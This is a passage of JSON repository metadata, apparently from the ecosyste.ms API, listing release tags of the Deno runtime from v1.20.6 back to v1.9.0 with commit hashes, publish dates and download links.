ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa